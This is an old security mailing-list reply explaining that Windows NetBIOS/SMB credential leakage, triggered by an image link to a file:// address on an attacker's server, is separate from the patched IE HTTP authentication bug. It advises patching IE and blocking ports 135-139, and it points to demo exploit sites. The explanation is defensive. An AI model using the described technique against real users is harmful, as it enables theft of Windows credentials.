Re: Latest IE FIX from MS is a HOAX

[mhw () WITTSEND COM (Michael H. Warfield)]

Aaron Spangler enscribed thusly:

> The Latest Internet Explorer Security Patch from Microsoft is a HOAX.

        'Fraid not...  You just don't understand the problem COMPLETELY.

> I just installed the latest Internet Explorer Released by Microsoft Today
> (IE 3.02 - Mar25).  It seems it is still COMPLETELY vulnerable to Bugs
> #4,#5 released earlier in the month even though it claims to fix them!!!

        No.  There are two problems which can look like each other.  As it
is, bugs #4 & #5 can utilize Samba on UNIX/Linux and are NOT dependent on the
bugs in IE, it's a different horse with the same colors.  There IS a bug in
IE, just NOT this one.

> Is Microsoft lying when they say it fixes the latest bugs?

        Microsoft lies about a LOT of things.  This is not one of them.  There
are TWO problems and BOTH must be fixed.  Only one of them is IE.  The other
is Netbios on TCP/IP and Windows {NT/95}.

> Try it our yourself.  Download IE 3.02 from MS, and
> try it on one of the sites

>  #4 http://www.ee.washington.edu/computing/iebug/  (For NT only)
>  #5 http://www.efsl.com/security/ntie/             (For NT only)

        These two web sites each take advantage of THE OTHER PROBLEM!  I've
used them BOTH in some tests and know exactly how they operate.  They are
utilizing Netbios on TCP/IP over port 139 to exploit Windows redirects.

> I have not even check bug #6 for win95, but it still may be vulnerable.
>  #6  http://www.security.org.il/msnetbreak/  (bug#6 for Win95)

        I THINK this is the same as #4 and #5 just a subtle variation.  I
have not tested this last site like the others, but will...

        Here is da scoop:

        There are two problems!

        1)  Internet Explorer, when talking to a COMPATIBLE (i.e. IIS)
server, is capable of performing an SMB challenge response over http.  In
other words, when Netscape would prompt you for "User Name" and "Password",
IE would blithely use your Windows NT / Windows 95 user name and password
whether that's what you wanted or not.  This operates over port 80 (http).
Simple test...  If you browse a hostile page, if you are prompted for user
name and password, this is the IE bug and you are safe.  This bug can NOT
use a SAMBA server.  It works purely over HTTP and requires an HTTP server
which understands the SMB challenge response.  Apache and NCSA are just NOT
going to cut it here.  I have YET to see anyone successfully exploit this
one.  That's NOT to say it can't be or hasn't been done.  It's just a lot
tougher and I haven't seen one YET.

        2)  Netbios exploit...  This is the bug exploited by the Samba
based servers.  If you feed a page with an image link to
"file://ip-address/filename", then Windows NT (and with a LITTLE work
Windows 95) will attempt an SMB Netbios connection to that IP address over
port 139.  That server will then challenge your client to provide a user name
and password.  Windows NT will provide this moderately encrypted (brute force
attack works REAL well) but Windows 95 will cough up the user name and
password in CLEAR TEXT!  This operates over TCP port 139 (netbios session)
with an assist from UDP port 137 (netbios name service) for Windows 95.
Solution: TOTALLY BLOCK all netbios ports!  (UDP and TCP ports 135-139)
This is a Windows problem which even Netscape will trip over!  If you
browse this page and you get BUSTED IMAGES, it is the SECOND problem and
you are safe.

        If you do not get prompted for a user name and password AND you
get nice clean images - you're screwed.  You failed ONE OR THE OTHER
of the vulnerabilities (only takes ONE of the TWO).

        The FIRST problem is Internet Explorer and Internet Explorer alone.
I am unaware of ANY pages currently on the Internet which exploit this
vulnerability in the absense of the second vulnerabilty.  The second
vulnerabilty has virtually identical symptoms but IS NOT restricted to
IE.  Even Netscape can be bit by this one.  This one convinces Windows
to establish a netbios redirect to the hostile server.  The browser is
unaware of what is happening and THINKS it is just asking for a LOCAL file.

        You CAN NOT fix this problem unless you get the fix for IE AND
block all of the Netbios ports!  BOTH MUST BE DONE OR NIETHER WILL DO YOU
ANY GOOD!  Get the update to IE and NOT block Netbios ports and you will
THINK the IE fixed didn't do any good!  Block the ports and use the buggy
IE and you get the SAME IDEA!  YA GOTTA FIX'EM BOTH!

        My NT expert didn't believe this until we did a double blind test
using our filtering firewall.  Now even he believes.  (Cost him a lunch
too...:->  Wish I had put some money on it to boot!)

>  - Aaron

> --
> Aaron Spangler                 EE Unix System Administrator
> Electrical Engineering FT-10        pokee () ee washington edu
> University of Washington            Phone    (206) 543-8984
> Box 352500                             or    (206) 543-2523
> Seattle, WA 98195-2500              Fax      (206) 543-3842

        Mike
--
 Michael H. Warfield    |  (770) 985-6132   |  mhw () WittsEnd com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!